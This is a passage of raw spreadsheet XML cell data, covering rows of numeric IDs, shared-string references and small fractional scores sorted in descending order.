      <c r="B14533" s="2">
        <v>4.0653885E7</v>
      </c>
      <c r="C14533" s="2" t="s">
        <v>14006</v>
      </c>
      <c r="D14533" s="2">
        <v>1.0</v>
      </c>
      <c r="E14533" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14533" s="2">
        <v>0.1247379454926625</v>
      </c>
    </row>
    <row r="14534" ht="15.75" customHeight="1">
      <c r="A14534" s="1">
        <v>7480.0</v>
      </c>
      <c r="B14534" s="2">
        <v>5.1352579E7</v>
      </c>
      <c r="C14534" s="2" t="s">
        <v>14007</v>
      </c>
      <c r="D14534" s="2">
        <v>1.0</v>
      </c>
      <c r="E14534" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14534" s="2">
        <v>0.1246031746031746</v>
      </c>
    </row>
    <row r="14535" ht="15.75" customHeight="1">
      <c r="A14535" s="1">
        <v>14501.0</v>
      </c>
      <c r="B14535" s="2">
        <v>3.966792E7</v>
      </c>
      <c r="C14535" s="2" t="s">
        <v>14008</v>
      </c>
      <c r="D14535" s="2">
        <v>1.0</v>
      </c>
      <c r="E14535" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14535" s="2">
        <v>0.1245519713261649</v>
      </c>
    </row>
    <row r="14536" ht="15.75" customHeight="1">
      <c r="A14536" s="1">
        <v>4312.0</v>
      </c>
      <c r="B14536" s="2">
        <v>4.1990804E7</v>
      </c>
      <c r="C14536" s="2" t="s">
        <v>14009</v>
      </c>
      <c r="D14536" s="2">
        <v>1.0</v>
      </c>
      <c r="E14536" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14536" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="14537" ht="15.75" customHeight="1">
      <c r="A14537" s="1">
        <v>4550.0</v>
      </c>
      <c r="B14537" s="2">
        <v>4.2683967E7</v>
      </c>
      <c r="C14537" s="2" t="s">
        <v>14010</v>
      </c>
      <c r="D14537" s="2">
        <v>1.0</v>
      </c>
      <c r="E14537" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14537" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="14538" ht="15.75" customHeight="1">
      <c r="A14538" s="1">
        <v>29087.0</v>
      </c>
      <c r="B14538" s="2">
        <v>3.036668E7</v>
      </c>
      <c r="C14538" s="2" t="s">
        <v>14011</v>
      </c>
      <c r="D14538" s="2">
        <v>1.0</v>
      </c>
      <c r="E14538" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14538" s="2">
        <v>0.1242424242424243</v>
      </c>
    </row>
    <row r="14539" ht="15.75" customHeight="1">
      <c r="A14539" s="1">
        <v>17363.0</v>
      </c>
      <c r="B14539" s="2">
        <v>4.9483441E7</v>
      </c>
      <c r="C14539" s="2" t="s">
        <v>14012</v>
      </c>
      <c r="D14539" s="2">
        <v>1.0</v>
      </c>
      <c r="E14539" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14539" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="14540" ht="15.75" customHeight="1">
      <c r="A14540" s="1">
        <v>23606.0</v>
      </c>
      <c r="B14540" s="2">
        <v>6405535.0</v>
      </c>
      <c r="C14540" s="2" t="s">
        <v>14013</v>
      </c>
      <c r="D14540" s="2">
        <v>1.0</v>
      </c>
      <c r="E14540" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14540" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="14541" ht="15.75" customHeight="1">
      <c r="A14541" s="1">
        <v>33170.0</v>
      </c>
      <c r="B14541" s="2">
        <v>7086085.0</v>
      </c>
      <c r="C14541" s="2" t="s">
        <v>13893</v>
      </c>
      <c r="D14541" s="2">
        <v>1.0</v>
      </c>
      <c r="E14541" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14541" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="14542" ht="15.75" customHeight="1">
      <c r="A14542" s="1">
        <v>18330.0</v>
      </c>
      <c r="B14542" s="2">
        <v>5.2412235E7</v>
      </c>
      <c r="C14542" s="2" t="s">
        <v>14014</v>
      </c>
      <c r="D14542" s="2">
        <v>1.0</v>
      </c>
      <c r="E14542" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14542" s="2">
        <v>0.1241319444444445</v>
      </c>
    </row>
    <row r="14543" ht="15.75" customHeight="1">
      <c r="A14543" s="1">
        <v>663.0</v>
      </c>
      <c r="B14543" s="2">
        <v>2.0131742E7</v>
      </c>
      <c r="C14543" s="2" t="s">
        <v>14015</v>
      </c>
      <c r="D14543" s="2">
        <v>1.0</v>
      </c>
      <c r="E14543" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14543" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="14544" ht="15.75" customHeight="1">
      <c r="A14544" s="1">
        <v>2037.0</v>
      </c>
      <c r="B14544" s="2">
        <v>3.0859633E7</v>
      </c>
      <c r="C14544" s="2" t="s">
        <v>14016</v>
      </c>
      <c r="D14544" s="2">
        <v>1.0</v>
      </c>
      <c r="E14544" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14544" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="14545" ht="15.75" customHeight="1">
      <c r="A14545" s="1">
        <v>4406.0</v>
      </c>
      <c r="B14545" s="2">
        <v>4.228093E7</v>
      </c>
      <c r="C14545" s="2" t="s">
        <v>14017</v>
      </c>
      <c r="D14545" s="2">
        <v>1.0</v>
      </c>
      <c r="E14545" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14545" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="14546" ht="15.75" customHeight="1">
      <c r="A14546" s="1">
        <v>8975.0</v>
      </c>
      <c r="B14546" s="2">
        <v>5.4954966E7</v>
      </c>
      <c r="C14546" s="2" t="s">
        <v>14018</v>
      </c>
      <c r="D14546" s="2">
        <v>1.0</v>
      </c>
      <c r="E14546" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14546" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="14547" ht="15.75" customHeight="1">
      <c r="A14547" s="1">
        <v>17494.0</v>
      </c>
      <c r="B14547" s="2">
        <v>4.9997422E7</v>
      </c>
      <c r="C14547" s="2" t="s">
        <v>14019</v>
      </c>
      <c r="D14547" s="2">
        <v>1.0</v>
      </c>
      <c r="E14547" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14547" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="14548" ht="15.75" customHeight="1">
      <c r="A14548" s="1">
        <v>19822.0</v>
      </c>
      <c r="B14548" s="2">
        <v>5.6990915E7</v>
      </c>
      <c r="C14548" s="2" t="s">
        <v>14020</v>
      </c>
      <c r="D14548" s="2">
        <v>1.0</v>
      </c>
      <c r="E14548" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14548" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="14549" ht="15.75" customHeight="1">
      <c r="A14549" s="1">
        <v>26076.0</v>
      </c>
      <c r="B14549" s="2">
        <v>1.5623017E7</v>
      </c>
      <c r="C14549" s="2" t="s">
        <v>14021</v>
      </c>
      <c r="D14549" s="2">
        <v>1.0</v>
      </c>
      <c r="E14549" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14549" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="14550" ht="15.75" customHeight="1">
      <c r="A14550" s="1">
        <v>30693.0</v>
      </c>
      <c r="B14550" s="2">
        <v>4254876.0</v>
      </c>
      <c r="C14550" s="2" t="s">
        <v>14022</v>
      </c>
      <c r="D14550" s="2">
        <v>1.0</v>
      </c>
      <c r="E14550" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14550" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="14551" ht="15.75" customHeight="1">
      <c r="A14551" s="1">
        <v>32004.0</v>
      </c>
      <c r="B14551" s="2">
        <v>5.3425744E7</v>
      </c>
      <c r="C14551" s="2" t="s">
        <v>14023</v>
      </c>
      <c r="D14551" s="2">
        <v>1.0</v>
      </c>
      <c r="E14551" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14551" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="14552" ht="15.75" customHeight="1">
      <c r="A14552" s="1">
        <v>32251.0</v>
      </c>
      <c r="B14552" s="2">
        <v>5.5086566E7</v>
      </c>
      <c r="C14552" s="2" t="s">
        <v>14024</v>
      </c>
      <c r="D14552" s="2">
        <v>1.0</v>
      </c>
      <c r="E14552" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14552" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="14553" ht="15.75" customHeight="1">
      <c r="A14553" s="1">
        <v>32703.0</v>
      </c>
      <c r="B14553" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C14553" s="2" t="s">
        <v>14025</v>
      </c>
      <c r="D14553" s="2">
        <v>1.0</v>
      </c>
      <c r="E14553" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14553" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="14554" ht="15.75" customHeight="1">
      <c r="A14554" s="1">
        <v>29754.0</v>
      </c>
      <c r="B14554" s="2">
        <v>3.4763803E7</v>
      </c>
      <c r="C14554" s="2" t="s">
        <v>14026</v>
      </c>
      <c r="D14554" s="2">
        <v>1.0</v>
      </c>
      <c r="E14554" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14554" s="2">
        <v>0.1239316239316239</v>
      </c>
    </row>
    <row r="14555" ht="15.75" customHeight="1">
      <c r="A14555" s="1">
        <v>14176.0</v>
      </c>
      <c r="B14555" s="2">
        <v>3.8072481E7</v>
      </c>
      <c r="C14555" s="2" t="s">
        <v>14027</v>
      </c>
      <c r="D14555" s="2">
        <v>1.0</v>
      </c>
      <c r="E14555" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14555" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="14556" ht="15.75" customHeight="1">
      <c r="A14556" s="1">
        <v>16600.0</v>
      </c>
      <c r="B14556" s="2">
        <v>4.7019206E7</v>
      </c>
      <c r="C14556" s="2" t="s">
        <v>14028</v>
      </c>
      <c r="D14556" s="2">
        <v>1.0</v>
      </c>
      <c r="E14556" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14556" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="14557" ht="15.75" customHeight="1">
      <c r="A14557" s="1">
        <v>19012.0</v>
      </c>
      <c r="B14557" s="2">
        <v>5.4517509E7</v>
      </c>
      <c r="C14557" s="2" t="s">
        <v>14029</v>
      </c>
      <c r="D14557" s="2">
        <v>1.0</v>
      </c>
      <c r="E14557" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14557" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="14558" ht="15.75" customHeight="1">
      <c r="A14558" s="1">
        <v>20839.0</v>
      </c>
      <c r="B14558" s="2">
        <v>1.5597998E7</v>
      </c>
      <c r="C14558" s="2" t="s">
        <v>14030</v>
      </c>
      <c r="D14558" s="2">
        <v>1.0</v>
      </c>
      <c r="E14558" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14558" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="14559" ht="15.75" customHeight="1">
      <c r="A14559" s="1">
        <v>28346.0</v>
      </c>
      <c r="B14559" s="2">
        <v>2.5923903E7</v>
      </c>
      <c r="C14559" s="2" t="s">
        <v>14031</v>
      </c>
      <c r="D14559" s="2">
        <v>1.0</v>
      </c>
      <c r="E14559" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14559" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="14560" ht="15.75" customHeight="1">
      <c r="A14560" s="1">
        <v>31295.0</v>
      </c>
      <c r="B14560" s="2">
        <v>4963662.0</v>
      </c>
      <c r="C14560" s="2" t="s">
        <v>14032</v>
      </c>
      <c r="D14560" s="2">
        <v>1.0</v>
      </c>
      <c r="E14560" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14560" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="14561" ht="15.75" customHeight="1">
      <c r="A14561" s="1">
        <v>18591.0</v>
      </c>
      <c r="B14561" s="2">
        <v>5.3258408E7</v>
      </c>
      <c r="C14561" s="2" t="s">
        <v>14033</v>
      </c>
      <c r="D14561" s="2">
        <v>1.0</v>
      </c>
      <c r="E14561" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14561" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="14562" ht="15.75" customHeight="1">
      <c r="A14562" s="1">
        <v>19359.0</v>
      </c>
      <c r="B14562" s="2">
        <v>5.5436411E7</v>
      </c>
      <c r="C14562" s="2" t="s">
        <v>14034</v>
      </c>
      <c r="D14562" s="2">
        <v>1.0</v>
      </c>
      <c r="E14562" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14562" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="14563" ht="15.75" customHeight="1">
      <c r="A14563" s="1">
        <v>2032.0</v>
      </c>
      <c r="B14563" s="2">
        <v>3.0811432E7</v>
      </c>
      <c r="C14563" s="2" t="s">
        <v>14035</v>
      </c>
      <c r="D14563" s="2">
        <v>1.0</v>
      </c>
      <c r="E14563" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14563" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="14564" ht="15.75" customHeight="1">
      <c r="A14564" s="1">
        <v>2888.0</v>
      </c>
      <c r="B14564" s="2">
        <v>3.5704632E7</v>
      </c>
      <c r="C14564" s="2" t="s">
        <v>14036</v>
      </c>
      <c r="D14564" s="2">
        <v>1.0</v>
      </c>
      <c r="E14564" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14564" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="14565" ht="15.75" customHeight="1">
      <c r="A14565" s="1">
        <v>3093.0</v>
      </c>
      <c r="B14565" s="2">
        <v>3.6684961E7</v>
      </c>
      <c r="C14565" s="2" t="s">
        <v>14037</v>
      </c>
      <c r="D14565" s="2">
        <v>1.0</v>
      </c>
      <c r="E14565" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14565" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="14566" ht="15.75" customHeight="1">
      <c r="A14566" s="1">
        <v>4552.0</v>
      </c>
      <c r="B14566" s="2">
        <v>4.2689373E7</v>
      </c>
      <c r="C14566" s="2" t="s">
        <v>14038</v>
      </c>
      <c r="D14566" s="2">
        <v>1.0</v>
      </c>
      <c r="E14566" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14566" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="14567" ht="15.75" customHeight="1">
      <c r="A14567" s="1">
        <v>5407.0</v>
      </c>
      <c r="B14567" s="2">
        <v>4.5511406E7</v>
      </c>
      <c r="C14567" s="2" t="s">
        <v>14039</v>
      </c>
      <c r="D14567" s="2">
        <v>1.0</v>
      </c>
      <c r="E14567" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14567" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="14568" ht="15.75" customHeight="1">
      <c r="A14568" s="1">
        <v>6934.0</v>
      </c>
      <c r="B14568" s="2">
        <v>4.9896016E7</v>
      </c>
      <c r="C14568" s="2" t="s">
        <v>14040</v>
      </c>
      <c r="D14568" s="2">
        <v>1.0</v>
      </c>
      <c r="E14568" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14568" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="14569" ht="15.75" customHeight="1">
      <c r="A14569" s="1">
        <v>7621.0</v>
      </c>
      <c r="B14569" s="2">
        <v>5.1728649E7</v>
      </c>
      <c r="C14569" s="2" t="s">
        <v>14041</v>
      </c>
      <c r="D14569" s="2">
        <v>1.0</v>
      </c>
      <c r="E14569" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14569" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="14570" ht="15.75" customHeight="1">
      <c r="A14570" s="1">
        <v>11912.0</v>
      </c>
      <c r="B14570" s="2">
        <v>2.5237675E7</v>
      </c>
      <c r="C14570" s="2" t="s">
        <v>14042</v>
      </c>
      <c r="D14570" s="2">
        <v>1.0</v>
      </c>
      <c r="E14570" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14570" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="14571" ht="15.75" customHeight="1">
      <c r="A14571" s="1">
        <v>13038.0</v>
      </c>
      <c r="B14571" s="2">
        <v>3.3057539E7</v>
      </c>
      <c r="C14571" s="2" t="s">
        <v>14043</v>
      </c>
      <c r="D14571" s="2">
        <v>1.0</v>
      </c>
      <c r="E14571" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14571" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="14572" ht="15.75" customHeight="1">
      <c r="A14572" s="1">
        <v>16880.0</v>
      </c>
      <c r="B14572" s="2">
        <v>4.7987784E7</v>
      </c>
      <c r="C14572" s="2" t="s">
        <v>14044</v>
      </c>
      <c r="D14572" s="2">
        <v>1.0</v>
      </c>
      <c r="E14572" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14572" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="14573" ht="15.75" customHeight="1">
      <c r="A14573" s="1">
        <v>17241.0</v>
      </c>
      <c r="B14573" s="2">
        <v>4.907855E7</v>
      </c>
      <c r="C14573" s="2" t="s">
        <v>14045</v>
      </c>
      <c r="D14573" s="2">
        <v>1.0</v>
      </c>
      <c r="E14573" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14573" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="14574" ht="15.75" customHeight="1">
      <c r="A14574" s="1">
        <v>24217.0</v>
      </c>
      <c r="B14574" s="2">
        <v>1.0422571E7</v>
      </c>
      <c r="C14574" s="2" t="s">
        <v>14046</v>
      </c>
      <c r="D14574" s="2">
        <v>1.0</v>
      </c>
      <c r="E14574" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14574" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="14575" ht="15.75" customHeight="1">
      <c r="A14575" s="1">
        <v>30098.0</v>
      </c>
      <c r="B14575" s="2">
        <v>3649286.0</v>
      </c>
      <c r="C14575" s="2" t="s">
        <v>14047</v>
      </c>
      <c r="D14575" s="2">
        <v>1.0</v>
      </c>
      <c r="E14575" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14575" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="14576" ht="15.75" customHeight="1">
      <c r="A14576" s="1">
        <v>30186.0</v>
      </c>
      <c r="B14576" s="2">
        <v>3.7190209E7</v>
      </c>
      <c r="C14576" s="2" t="s">
        <v>14048</v>
      </c>
      <c r="D14576" s="2">
        <v>1.0</v>
      </c>
      <c r="E14576" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14576" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="14577" ht="15.75" customHeight="1">
      <c r="A14577" s="1">
        <v>31930.0</v>
      </c>
      <c r="B14577" s="2">
        <v>5305124.0</v>
      </c>
      <c r="C14577" s="2" t="s">
        <v>14049</v>
      </c>
      <c r="D14577" s="2">
        <v>1.0</v>
      </c>
      <c r="E14577" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14577" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="14578" ht="15.75" customHeight="1">
      <c r="A14578" s="1">
        <v>4155.0</v>
      </c>
      <c r="B14578" s="2">
        <v>4.1442266E7</v>
      </c>
      <c r="C14578" s="2" t="s">
        <v>14050</v>
      </c>
      <c r="D14578" s="2">
        <v>1.0</v>
      </c>
      <c r="E14578" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14578" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="14579" ht="15.75" customHeight="1">
      <c r="A14579" s="1">
        <v>5154.0</v>
      </c>
      <c r="B14579" s="2">
        <v>4.4711842E7</v>
      </c>
      <c r="C14579" s="2" t="s">
        <v>14051</v>
      </c>
      <c r="D14579" s="2">
        <v>1.0</v>
      </c>
      <c r="E14579" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14579" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="14580" ht="15.75" customHeight="1">
      <c r="A14580" s="1">
        <v>9726.0</v>
      </c>
      <c r="B14580" s="2">
        <v>5.6431549E7</v>
      </c>
      <c r="C14580" s="2" t="s">
        <v>14052</v>
      </c>
      <c r="D14580" s="2">
        <v>1.0</v>
      </c>
      <c r="E14580" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14580" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="14581" ht="15.75" customHeight="1">
      <c r="A14581" s="1">
        <v>30188.0</v>
      </c>
      <c r="B14581" s="2">
        <v>3.7193123E7</v>
      </c>
      <c r="C14581" s="2" t="s">
        <v>14053</v>
      </c>
      <c r="D14581" s="2">
        <v>1.0</v>
      </c>
      <c r="E14581" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14581" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="14582" ht="15.75" customHeight="1">
      <c r="A14582" s="1">
        <v>12672.0</v>
      </c>
      <c r="B14582" s="2">
        <v>3.0589507E7</v>
      </c>
      <c r="C14582" s="2" t="s">
        <v>14054</v>
      </c>
      <c r="D14582" s="2">
        <v>1.0</v>
      </c>
      <c r="E14582" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14582" s="2">
        <v>0.1231481481481482</v>
      </c>
    </row>
    <row r="14583" ht="15.75" customHeight="1">
      <c r="A14583" s="1">
        <v>13863.0</v>
      </c>
      <c r="B14583" s="2">
        <v>3.69436E7</v>
      </c>
      <c r="C14583" s="2" t="s">
        <v>14055</v>
      </c>
      <c r="D14583" s="2">
        <v>1.0</v>
      </c>
      <c r="E14583" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14583" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="14584" ht="15.75" customHeight="1">
      <c r="A14584" s="1">
        <v>26393.0</v>
      </c>
      <c r="B14584" s="2">
        <v>1.7002472E7</v>
      </c>
      <c r="C14584" s="2" t="s">
        <v>14056</v>
      </c>
      <c r="D14584" s="2">
        <v>1.0</v>
      </c>
      <c r="E14584" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14584" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="14585" ht="15.75" customHeight="1">
      <c r="A14585" s="1">
        <v>2671.0</v>
      </c>
      <c r="B14585" s="2">
        <v>3.4754668E7</v>
      </c>
      <c r="C14585" s="2" t="s">
        <v>14057</v>
      </c>
      <c r="D14585" s="2">
        <v>1.0</v>
      </c>
      <c r="E14585" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14585" s="2">
        <v>0.1229508196721312</v>
      </c>
    </row>
    <row r="14586" ht="15.75" customHeight="1">
      <c r="A14586" s="1">
        <v>26278.0</v>
      </c>
      <c r="B14586" s="2">
        <v>1.6424607E7</v>
      </c>
      <c r="C14586" s="2" t="s">
        <v>14058</v>
      </c>
      <c r="D14586" s="2">
        <v>1.0</v>
      </c>
      <c r="E14586" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14586" s="2">
        <v>0.1229508196721312</v>
      </c>
    </row>
    <row r="14587" ht="15.75" customHeight="1">
      <c r="A14587" s="1">
        <v>5556.0</v>
      </c>
      <c r="B14587" s="2">
        <v>4.5970786E7</v>
      </c>
      <c r="C14587" s="2" t="s">
        <v>14059</v>
      </c>
      <c r="D14587" s="2">
        <v>1.0</v>
      </c>
      <c r="E14587" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14587" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="14588" ht="15.75" customHeight="1">
      <c r="A14588" s="1">
        <v>19563.0</v>
      </c>
      <c r="B14588" s="2">
        <v>5.6105947E7</v>
      </c>
      <c r="C14588" s="2" t="s">
        <v>14060</v>
      </c>
      <c r="D14588" s="2">
        <v>1.0</v>
      </c>
      <c r="E14588" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14588" s="2">
        <v>0.1226415094339623</v>
      </c>
    </row>
    <row r="14589" ht="15.75" customHeight="1">
      <c r="A14589" s="1">
        <v>18056.0</v>
      </c>
      <c r="B14589" s="2">
        <v>5.1586239E7</v>
      </c>
      <c r="C14589" s="2" t="s">
        <v>14061</v>
      </c>
      <c r="D14589" s="2">
        <v>1.0</v>
      </c>
      <c r="E14589" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14589" s="2">
        <v>0.1225749559082893</v>
      </c>
    </row>
    <row r="14590" ht="15.75" customHeight="1">
      <c r="A14590" s="1">
        <v>46.0</v>
      </c>
      <c r="B14590" s="2">
        <v>1.0822916E7</v>
      </c>
      <c r="C14590" s="2" t="s">
        <v>14062</v>
      </c>
      <c r="D14590" s="2">
        <v>1.0</v>
      </c>
      <c r="E14590" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14590" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="14591" ht="15.75" customHeight="1">
      <c r="A14591" s="1">
        <v>6090.0</v>
      </c>
      <c r="B14591" s="2">
        <v>4.7694156E7</v>
      </c>
      <c r="C14591" s="2" t="s">
        <v>14063</v>
      </c>
      <c r="D14591" s="2">
        <v>1.0</v>
      </c>
      <c r="E14591" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14591" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="14592" ht="15.75" customHeight="1">
      <c r="A14592" s="1">
        <v>8362.0</v>
      </c>
      <c r="B14592" s="2">
        <v>5.3779067E7</v>
      </c>
      <c r="C14592" s="2" t="s">
        <v>14064</v>
      </c>
      <c r="D14592" s="2">
        <v>1.0</v>
      </c>
      <c r="E14592" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14592" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="14593" ht="15.75" customHeight="1">
      <c r="A14593" s="1">
        <v>10118.0</v>
      </c>
      <c r="B14593" s="2">
        <v>5.7253379E7</v>
      </c>
      <c r="C14593" s="2" t="s">
        <v>14065</v>
      </c>
      <c r="D14593" s="2">
        <v>1.0</v>
      </c>
      <c r="E14593" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14593" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="14594" ht="15.75" customHeight="1">
      <c r="A14594" s="1">
        <v>10451.0</v>
      </c>
      <c r="B14594" s="2">
        <v>1.061438E7</v>
      </c>
      <c r="C14594" s="2" t="s">
        <v>14066</v>
      </c>
      <c r="D14594" s="2">
        <v>1.0</v>
      </c>
      <c r="E14594" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14594" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="14595" ht="15.75" customHeight="1">
      <c r="A14595" s="1">
        <v>15563.0</v>
      </c>
      <c r="B14595" s="2">
        <v>4.3428828E7</v>
      </c>
      <c r="C14595" s="2" t="s">
        <v>14067</v>
      </c>
      <c r="D14595" s="2">
        <v>1.0</v>
      </c>
      <c r="E14595" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14595" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="14596" ht="15.75" customHeight="1">
      <c r="A14596" s="1">
        <v>20795.0</v>
      </c>
      <c r="B14596" s="2">
        <v>1.5244196E7</v>
      </c>
      <c r="C14596" s="2" t="s">
        <v>14068</v>
      </c>
      <c r="D14596" s="2">
        <v>1.0</v>
      </c>
      <c r="E14596" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14596" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="14597" ht="15.75" customHeight="1">
      <c r="A14597" s="1">
        <v>3086.0</v>
      </c>
      <c r="B14597" s="2">
        <v>3.664138E7</v>
      </c>
      <c r="C14597" s="2" t="s">
        <v>14069</v>
      </c>
      <c r="D14597" s="2">
        <v>1.0</v>
      </c>
      <c r="E14597" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14597" s="2">
        <v>0.1223723723723724</v>
      </c>
    </row>
    <row r="14598" ht="15.75" customHeight="1">
      <c r="A14598" s="1">
        <v>26408.0</v>
      </c>
      <c r="B14598" s="2">
        <v>1.7088168E7</v>
      </c>
      <c r="C14598" s="2" t="s">
        <v>14070</v>
      </c>
      <c r="D14598" s="2">
        <v>1.0</v>
      </c>
      <c r="E14598" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14598" s="2">
        <v>0.1222222222222223</v>
      </c>
    </row>
    <row r="14599" ht="15.75" customHeight="1">
      <c r="A14599" s="1">
        <v>7688.0</v>
      </c>
      <c r="B14599" s="2">
        <v>5.1952393E7</v>
      </c>
      <c r="C14599" s="2" t="s">
        <v>14071</v>
      </c>
      <c r="D14599" s="2">
        <v>1.0</v>
      </c>
      <c r="E14599" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14599" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="14600" ht="15.75" customHeight="1">
      <c r="A14600" s="1">
        <v>8745.0</v>
      </c>
      <c r="B14600" s="2">
